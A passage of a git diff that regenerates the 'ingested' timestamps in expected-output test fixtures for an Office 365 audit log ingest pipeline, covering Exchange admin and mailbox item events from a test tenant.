Organizations/testsiem.onmicrosoft.com/SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}\"},{\"Name\":\"GMGen\",\"Value\":\"True\"},{\"Name\":\"SuiteServiceStorage\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7374,7 +7374,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853465900Z", + "ingested": "2021-12-14T14:49:28.056994263Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"c6db95ea-9eae-4b58-d692-08d7adfc0d98\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{505B6405-958B-45A0-BAAE-76A0D7ACAE83}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7444,7 +7444,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853471600Z", + "ingested": "2021-12-14T14:49:28.056994710Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:49:52\",\"ExternalAccess\":true,\"Id\":\"c706f54e-1b00-43ed-5b06-08d7ac0f47a6\",\"ObjectId\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\",\"Operation\":\"Set-RecipientEnforcementProvisioningPolicy\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"DomainController\",\"Value\":\"\"},{\"Name\":\"IgnoreDehydratedFlag\",\"Value\":\"True\"},{\"Name\":\"Identity\",\"Value\":\"testsiem.onmicrosoft.com\\\\Recipient Quota Policy\"},{\"Name\":\"PublicFolderHierarchyMailboxCountQuota\",\"Value\":\"100\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7525,7 +7525,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853475500Z", + "ingested": "2021-12-14T14:49:28.056995141Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:15\",\"ExternalAccess\":true,\"Id\":\"fcd82149-fc1c-4866-e16d-08d7adfc0cff\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{368F7EFB-D8B2-448B-A304-41EA44801476}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7608,7 +7608,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853480200Z", + "ingested": "2021-12-14T14:49:28.056995572Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-07T20:48:44\",\"ExternalAccess\":true,\"Id\":\"e79cb83c-25b7-4777-57f0-08d7ac0f1f74\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"Management\",\"Value\":\"True\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"DisplayName\",\"Value\":\"Microsoft Exchange Migration\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"9 GB (9,663,676,416 bytes)\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"Migration\",\"Value\":\"True\"},{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"10 GB (10,737,418,240 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/Migration.8f3e7716-2011-43e4-96b1-aba62d229136\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", @@ -7689,7 +7689,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:30.853484400Z", + "ingested": "2021-12-14T14:49:28.056996010Z", "original": "{\"AppId\":\"\",\"ClientAppId\":\"\",\"CreationTime\":\"2020-02-10T07:37:16\",\"ExternalAccess\":true,\"Id\":\"e9e580ee-ac04-436f-9214-08d7adfc0d8b\",\"ObjectId\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\",\"Operation\":\"Set-Mailbox\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"HE1PR0102MB3228 (67.43.156.13)\",\"Parameters\":[{\"Name\":\"RecoverableItemsQuota\",\"Value\":\"30 GB (32,212,254,720 bytes)\"},{\"Name\":\"Force\",\"Value\":\"True\"},{\"Name\":\"Arbitration\",\"Value\":\"True\"},{\"Name\":\"QuarantineMessageStore\",\"Value\":\"True\"},{\"Name\":\"ProhibitSendQuota\",\"Value\":\"99 GB (106,300,440,576 bytes)\"},{\"Name\":\"HiddenFromAddressListsEnabled\",\"Value\":\"True\"},{\"Name\":\"SCLDeleteEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLQuarantineEnabled\",\"Value\":\"False\"},{\"Name\":\"SCLRejectEnabled\",\"Value\":\"False\"},{\"Name\":\"UseDatabaseQuotaDefaults\",\"Value\":\"False\"},{\"Name\":\"RecoverableItemsWarningQuota\",\"Value\":\"20 GB (21,474,836,480 bytes)\"},{\"Name\":\"IssueWarningQuota\",\"Value\":\"90 GB (96,636,764,160 bytes)\"},{\"Name\":\"Identity\",\"Value\":\"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/QuarantineOrgShard{D5FD6316-0A84-416F-8512-3E97EBAF9B1D}\"},{\"Name\":\"ProhibitSendReceiveQuota\",\"Value\":\"100 GB (107,374,182,400 bytes)\"},{\"Name\":\"SCLJunkEnabled\",\"Value\":\"False\"}],\"RecordType\":1,\"ResultStatus\":\"True\",\"UserId\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserKey\":\"NT AUTHORITY\\\\SYSTEM (Microsoft.Exchange.ServiceHost)\",\"UserType\":3,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeAdmin", "provider": "Exchange", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json index 563eacc3772..c043da488ca 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-exchange-item-events.json-expected.json @@ -72,7 +72,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659926900Z", + "ingested": "2021-12-14T14:49:39.335742746Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (599b); warming_email_03_2017_conversation.png (614b); warming_email_03_2017_links.png (1403b); google_play_store_badge.png (4824b); apple_store_badge.png (4446b); windows_store_badge.png (3681b); warming_email_03_2017_files.png (809b); warming_email_03_2017_sharePoint.png (1432b)\",\"Id\":\"RgAAAACklF6sEsJgSK/ulVd531/WBwCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAACzgXIUnq3lQqXFeCmxHwmHAAAAABULAAAJ\",\"InternetMessageId\":\"\\u003cAM6PR01MB4535D305187FEC8127CF8EDFEE160@AM6PR01MB4535.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new SIEMTest group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", @@ -164,7 +164,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659935500Z", + "ingested": "2021-12-14T14:49:39.335745234Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:46\",\"ExternalAccess\":true,\"Id\":\"c0790552-9989-4e91-cba4-08d7b386e642\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABQ7FIOAzxlR4hKCRQRbTbvBwBTdQb34omtRrZGvP+4ONQkAAAAAAEMAABTdQb34omtRrZGvP+4ONQkAAAAAA0lAAAJ\",\"InternetMessageId\":\"\\u003cDB3PR0102MB35003D203E5553CBC1B8AAEAE2160@DB3PR0102MB3500.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", @@ -256,7 +256,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659941200Z", + "ingested": "2021-12-14T14:49:39.335745743Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:31\",\"ExternalAccess\":true,\"Id\":\"c6b58ed7-a54a-47cf-a301-08d7b386dd7c\",\"InternalLogonType\":1,\"Item\":{\"Attachments\":\"warming_email_03_2017_calendar.png (598b); warming_email_03_2017_conversation.png (613b); warming_email_03_2017_links.png (1402b); google_play_store_badge.png (4823b); apple_store_badge.png (4445b); windows_store_badge.png (3680b); warming_email_03_2017_files.png (808b); warming_email_03_2017_sharePoint.png (1431b)\",\"Id\":\"RgAAAABkkJvTy6NaRYV8EL+vMtzZBwAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAk6unHVumCRJNhRrAMRwYLAAAAAAk9AAAJ\",\"InternetMessageId\":\"\\u003cDB7PR01MB442884FC2132AE2A909799BAFC160@DB7PR01MB4428.eurprd01.prod.exchangelabs.com\\u003e\",\"IsRecord\":false,\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAEMAAAB\",\"Path\":\"\\\\Inbox\"},\"Subject\":\"The new All Company group is ready\"},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"Create\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", @@ -348,7 +348,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659946600Z", + "ingested": "2021-12-14T14:49:39.335746252Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"815684be-4e52-4cb2-9242-08d7b386e333\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", @@ -440,7 +440,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659952200Z", + "ingested": "2021-12-14T14:49:39.335746713Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"f5b56c26-18aa-4984-822e-08d7b386d7e2\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", @@ -532,7 +532,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659957700Z", + "ingested": "2021-12-14T14:49:39.335747147Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:22\",\"ExternalAccess\":true,\"Id\":\"25ccad93-82ad-4742-5231-08d7b386d7e6\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABkkJvTy6NaRYV8EL+vMtzZAQAk6unHVumCRJNhRrAMRwYLAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-1750167797-1192043064-2586004354-3182407426-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"685170f5-2238-470d-824b-239a02afafbd\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679882\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.sqtielgo@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB7PR01MB4428 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", @@ -624,7 +624,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659963600Z", + "ingested": "2021-12-14T14:49:39.335747680Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T08:53:41\",\"ExternalAccess\":true,\"Id\":\"edb9bb1f-9629-43a1-0a57-08d7b386e31c\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAABQ7FIOAzxlR4hKCRQRbTbvAQBTdQb34omtRrZGvP+4ONQkAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-2005823449-1144108501-1529089953-3087822558-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"778e6fd9-b5d5-4431-a10f-245bde6e0cb8\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26679883\",\"MailboxOwnerUPN\":\"AllCompany.4529848321.eqpfynvc@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"DB3PR0102MB3500 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", @@ -716,7 +716,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659969200Z", + "ingested": "2021-12-14T14:49:39.335748268Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"df63d186-b4d9-49a8-748c-08d7b3cc81fb\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-1\",\"MemberUpn\":\"Member@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", 